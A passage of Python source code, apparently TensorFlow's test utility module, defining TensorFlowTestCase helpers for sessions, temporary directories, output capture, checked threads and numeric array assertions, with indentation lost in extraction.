self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This
stream must have a file descriptor, support writing via using that
file descriptor, and must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices, tensor.values,
tensor.dense_shape)
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound)
if open_lower_bound else np.less(target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
